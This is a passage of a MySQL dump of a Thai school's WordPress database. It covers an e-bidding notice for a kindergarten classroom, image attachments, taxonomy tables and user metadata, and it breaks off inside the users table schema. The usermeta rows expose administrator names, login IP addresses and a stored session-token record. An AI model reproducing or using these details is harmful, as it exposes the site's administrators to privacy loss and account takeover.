-->\n\n<!-- wp:image {\"id\":781,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0005-1024x791.jpg\" alt=\"\" class=\"wp-image-781\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":782,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0006-1024x791.jpg\" alt=\"\" class=\"wp-image-782\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":783,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0007-1024x791.jpg\" alt=\"\" class=\"wp-image-783\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":784,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0008-1024x791.jpg\" alt=\"\" class=\"wp-image-784\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":785,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-1024x768.jpg\" alt=\"\" class=\"wp-image-785\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":786,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-1024x768.jpg\" alt=\"\" class=\"wp-image-786\"/></figure>\n<!-- /wp:image -->','เรื่อง งานประกวดราคาจ้างสร้างห้องเรียนอนุบาล ระบบ e-bidding ','','publish','open','open','','%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87-%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2','','','2026-03-27 11:27:45','2026-03-27 04:27:45','',0,'http://watprato.ssk.in.th/?p=776',0,'post','',0),
(777,1,'2026-03-27 11:23:24','2026-03-27 04:23:24','','ilovepdf_merged_page-0001','','inherit','open','closed','','ilovepdf_merged_page-0001','','','2026-03-27 11:23:24','2026-03-27 04:23:24','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0001.jpg',0,'attachment','image/jpeg',0),
(778,1,'2026-03-27 11:24:13','2026-03-27 04:24:13','','ilovepdf_merged_page-0002','','inherit','open','closed','','ilovepdf_merged_page-0002','','','2026-03-27 11:24:13','2026-03-27 04:24:13','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0002.jpg',0,'attachment','image/jpeg',0),
(779,1,'2026-03-27 11:24:24','2026-03-27 04:24:24','','ilovepdf_merged_page-0003','','inherit','open','closed','','ilovepdf_merged_page-0003','','','2026-03-27 11:24:24','2026-03-27 04:24:24','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0003.jpg',0,'attachment','image/jpeg',0),
(780,1,'2026-03-27 11:24:34','2026-03-27 04:24:34','','ilovepdf_merged_page-0004','','inherit','open','closed','','ilovepdf_merged_page-0004','','','2026-03-27 11:24:34','2026-03-27 04:24:34','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0004.jpg',0,'attachment','image/jpeg',0),
(781,1,'2026-03-27 11:24:42','2026-03-27 04:24:42','','ilovepdf_merged_page-0005','','inherit','open','closed','','ilovepdf_merged_page-0005','','','2026-03-27 11:24:42','2026-03-27 04:24:42','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0005.jpg',0,'attachment','image/jpeg',0),
(782,1,'2026-03-27 11:24:52','2026-03-27 04:24:52','','ilovepdf_merged_page-0006','','inherit','open','closed','','ilovepdf_merged_page-0006','','','2026-03-27 11:24:52','2026-03-27 04:24:52','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0006.jpg',0,'attachment','image/jpeg',0),
(783,1,'2026-03-27 11:25:01','2026-03-27 04:25:01','','ilovepdf_merged_page-0007','','inherit','open','closed','','ilovepdf_merged_page-0007','','','2026-03-27 11:25:01','2026-03-27 04:25:01','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0007.jpg',0,'attachment','image/jpeg',0),
(784,1,'2026-03-27 11:25:11','2026-03-27 04:25:11','','ilovepdf_merged_page-0008','','inherit','open','closed','','ilovepdf_merged_page-0008','','','2026-03-27 11:25:11','2026-03-27 04:25:11','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0008.jpg',0,'attachment','image/jpeg',0),
(785,1,'2026-03-27 11:25:30','2026-03-27 04:25:30','','LINE_ALBUM_ปลูกหญ้าอาคารใหม่ 29-10-66_260327_1','','inherit','open','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%ab%e0%b8%8d%e0%b9%89%e0%b8%b2%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b9%83%e0%b8%ab%e0%b8%a1%e0%b9%88-29-10-66_260327_1','','','2026-03-27 11:25:30','2026-03-27 04:25:30','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1.jpg',0,'attachment','image/jpeg',0),
(786,1,'2026-03-27 11:25:39','2026-03-27 04:25:39','','LINE_ALBUM_ปลูกหญ้าอาคารใหม่ 29-10-66_260327_2','','inherit','open','closed','','line_album_%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%ab%e0%b8%8d%e0%b9%89%e0%b8%b2%e0%b8%ad%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b9%83%e0%b8%ab%e0%b8%a1%e0%b9%88-29-10-66_260327_2','','','2026-03-27 11:25:39','2026-03-27 04:25:39','',776,'http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2.jpg',0,'attachment','image/jpeg',0),
(787,1,'2026-03-27 11:25:46','2026-03-27 04:25:46','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":777,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0001-1024x724.jpg\" alt=\"\" class=\"wp-image-777\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"id\":778,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0002-1024x724.jpg\" alt=\"\" class=\"wp-image-778\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":779,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0003-1024x724.jpg\" alt=\"\" class=\"wp-image-779\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":780,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0004-1024x724.jpg\" alt=\"\" class=\"wp-image-780\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":781,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0005-1024x791.jpg\" alt=\"\" class=\"wp-image-781\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":782,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0006-1024x791.jpg\" alt=\"\" class=\"wp-image-782\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":783,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0007-1024x791.jpg\" alt=\"\" class=\"wp-image-783\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":784,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0008-1024x791.jpg\" alt=\"\" class=\"wp-image-784\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":785,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-1024x768.jpg\" alt=\"\" class=\"wp-image-785\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":786,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-1024x768.jpg\" alt=\"\" class=\"wp-image-786\"/></figure>\n<!-- /wp:image -->','เรื่อง งานประกวดราคาจ้างห้องเรียนอนุบาล ระบบ e-bidding ','','inherit','closed','closed','','776-revision-v1','','','2026-03-27 11:25:46','2026-03-27 04:25:46','',776,'http://watprato.ssk.in.th/?p=787',0,'revision','',0),
(788,1,'2026-03-27 11:27:43','2026-03-27 04:27:43','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":777,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0001-1024x724.jpg\" alt=\"\" class=\"wp-image-777\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:image {\"id\":778,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0002-1024x724.jpg\" alt=\"\" class=\"wp-image-778\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":779,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0003-1024x724.jpg\" alt=\"\" class=\"wp-image-779\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":780,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0004-1024x724.jpg\" alt=\"\" class=\"wp-image-780\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":781,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0005-1024x791.jpg\" alt=\"\" class=\"wp-image-781\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":782,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0006-1024x791.jpg\" alt=\"\" class=\"wp-image-782\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":783,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0007-1024x791.jpg\" alt=\"\" class=\"wp-image-783\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":784,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/ilovepdf_merged_page-0008-1024x791.jpg\" alt=\"\" class=\"wp-image-784\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":785,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-1024x768.jpg\" alt=\"\" class=\"wp-image-785\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":786,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-1024x768.jpg\" alt=\"\" class=\"wp-image-786\"/></figure>\n<!-- /wp:image -->','เรื่อง งานประกวดราคาจ้างสร้างห้องเรียนอนุบาล ระบบ e-bidding ','','inherit','closed','closed','','776-revision-v1','','','2026-03-27 11:27:43','2026-03-27 04:27:43','',776,'http://watprato.ssk.in.th/?p=788',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sgpb_subscribers`
--

DROP TABLE IF EXISTS `wp_sgpb_subscribers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_sgpb_subscribers` (
  `id` int(12) NOT NULL AUTO_INCREMENT,
  `firstName` varchar(255) DEFAULT NULL,
  `lastName` varchar(255) DEFAULT NULL,
  `email` varchar(255) DEFAULT NULL,
  `subscriptionType` int(12) DEFAULT NULL,
  `cDate` date DEFAULT NULL,
  `status` varchar(255) DEFAULT NULL,
  `unsubscribed` int(11) DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sgpb_subscribers`
--

LOCK TABLES `wp_sgpb_subscribers` WRITE;
/*!40000 ALTER TABLE `wp_sgpb_subscribers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_sgpb_subscribers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sgpb_subscription_error_log`
--

DROP TABLE IF EXISTS `wp_sgpb_subscription_error_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_sgpb_subscription_error_log` (
  `id` int(12) NOT NULL AUTO_INCREMENT,
  `firstName` varchar(255) DEFAULT NULL,
  `popupType` varchar(255) DEFAULT NULL,
  `email` varchar(255) DEFAULT NULL,
  `date` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sgpb_subscription_error_log`
--

LOCK TABLES `wp_sgpb_subscription_error_log` WRITE;
/*!40000 ALTER TABLE `wp_sgpb_subscription_error_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_sgpb_subscription_error_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES
(26,2,0),
(35,2,0),
(36,2,0),
(37,2,0),
(38,2,0),
(39,2,0),
(88,3,0),
(96,1,0),
(96,3,0),
(100,1,0),
(100,3,0),
(100,4,0),
(104,1,0),
(104,3,0),
(107,5,0),
(112,1,0),
(112,5,0),
(116,3,0),
(116,4,0),
(119,5,0),
(123,1,0),
(123,3,0),
(127,5,0),
(136,4,0),
(140,4,0),
(147,4,0),
(158,3,0),
(177,3,0),
(189,3,0),
(306,5,0),
(349,3,0),
(358,5,0),
(367,1,0),
(367,3,0),
(388,5,0),
(441,1,0),
(441,5,0),
(444,4,0),
(449,4,0),
(453,4,0),
(457,3,0),
(463,5,0),
(469,3,0),
(482,3,0),
(490,4,0),
(504,3,0),
(514,3,0),
(537,4,0),
(541,4,0),
(546,5,0),
(549,5,0),
(552,5,0),
(592,1,0),
(592,3,0),
(598,1,0),
(598,3,0),
(608,1,0),
(608,3,0),
(625,1,0),
(625,3,0),
(649,1,0),
(649,3,0),
(660,5,0),
(665,5,0),
(751,1,0),
(751,3,0),
(776,1,0),
(776,5,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES
(1,1,'category','',0,14),
(2,2,'nav_menu','',0,6),
(3,3,'category','',0,22),
(4,4,'category','',0,11),
(5,5,'category','',0,15);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES
(1,'ข่าวประชาสัมพันธ์','pr',0),
(2,'Primary Menu','primary-menu',0),
(3,'ข่าวกิจกรรมโรงเรียน','news',0),
(4,'ผลงานนักเรียน/ครู','%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9',0),
(5,'จดหมายประชาสัมพันธ์','%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=59 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES
(1,1,'nickname','admin'),
(2,1,'first_name',''),
(3,1,'last_name',''),
(4,1,'description',''),
(5,1,'rich_editing','true'),
(6,1,'syntax_highlighting','true'),
(7,1,'comment_shortcuts','false'),
(8,1,'admin_color','fresh'),
(9,1,'use_ssl','0'),
(10,1,'show_admin_bar_front','true'),
(11,1,'locale',''),
(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),
(13,1,'wp_user_level','10'),
(14,1,'dismissed_wp_pointers',''),
(15,1,'show_welcome_panel','0'),
(17,1,'wp_dashboard_quick_press_last_post_id','775'),
(18,1,'community-events-location','a:1:{s:2:\"ip\";s:10:\"58.10.73.0\";}'),
(19,1,'wp_user-settings','libraryContent=browse&mfold=o'),
(20,1,'wp_user-settings-time','1752481664'),
(21,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),
(22,1,'metaboxhidden_nav-menus','a:2:{i:0;s:26:\"add-post-type-popupbuilder\";i:1;s:12:\"add-post_tag\";}'),
(23,1,'nav_menu_recently_edited','2'),
(24,1,'wp_persisted_preferences','a:6:{s:14:\"core/edit-post\";a:1:{s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2025-11-17T04:08:05.935Z\";s:4:\"core\";a:2:{s:10:\"openPanels\";a:4:{i:0;s:11:\"post-status\";i:1;s:24:\"yoast-seo/document-panel\";i:2;s:14:\"featured-image\";i:3;s:23:\"taxonomy-panel-category\";}s:26:\"isComplementaryAreaVisible\";b:1;}s:17:\"core/edit-widgets\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}s:17:\"core/block-editor\";a:1:{s:25:\"linkControlSettingsDrawer\";b:1;}s:22:\"core/customize-widgets\";a:1:{s:12:\"welcomeGuide\";b:0;}}'),
(25,2,'nickname','outan samakhom'),
(26,2,'first_name','อุเทน'),
(27,2,'last_name','สมาคม'),
(28,2,'description',''),
(29,2,'rich_editing','true'),
(30,2,'syntax_highlighting','true'),
(31,2,'comment_shortcuts','false'),
(32,2,'admin_color','fresh'),
(33,2,'use_ssl','0'),
(34,2,'show_admin_bar_front','true'),
(35,2,'locale','th'),
(36,2,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),
(37,2,'wp_user_level','10'),
(38,2,'dismissed_wp_pointers',''),
(39,1,'closedpostboxes_post','a:0:{}'),
(40,1,'metaboxhidden_post','a:0:{}'),
(41,1,'meta-box-order_post','a:4:{s:6:\"normal\";s:35:\"seed_social_box,seed_social_disable\";s:8:\"advanced\";s:0:\"\";s:15:\"acf_after_title\";s:0:\"\";s:4:\"side\";s:23:\"acf-group_5d1a01feea33c\";}'),
(43,2,'wp_dashboard_quick_press_last_post_id','395'),
(44,2,'community-events-location','a:1:{s:2:\"ip\";s:9:\"1.1.242.0\";}'),
(45,2,'wp_persisted_preferences','a:4:{s:4:\"core\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:10:\"openPanels\";a:3:{i:0;s:11:\"post-status\";i:1;s:23:\"taxonomy-panel-category\";i:2;s:23:\"taxonomy-panel-post_tag\";}}s:14:\"core/edit-post\";a:1:{s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2024-08-30T03:27:58.510Z\";s:17:\"core/edit-widgets\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}}'),
(46,2,'wp_user-settings','libraryContent=browse'),
(47,2,'wp_user-settings-time','1723694821'),
(49,2,'nav_menu_recently_edited','2'),
(50,2,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),
(51,2,'metaboxhidden_nav-menus','a:2:{i:0;s:26:\"add-post-type-popupbuilder\";i:1;s:12:\"add-post_tag\";}'),
(54,2,'generateblocks_onboarding','a:1:{s:22:\"insert_inner_container\";b:1;}'),
(56,1,'tgmpa_dismissed_notice_plant','1'),
(58,1,'session_tokens','a:1:{s:64:\"e691b8d52a11e70b8f1bc7b990bc2a76f7b0b97272b5cec75d035281584e330a\";a:4:{s:10:\"expiration\";i:1774756616;s:2:\"ip\";s:11:\"58.10.73.29\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36\";s:5:\"login\";i:1774583816;}}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
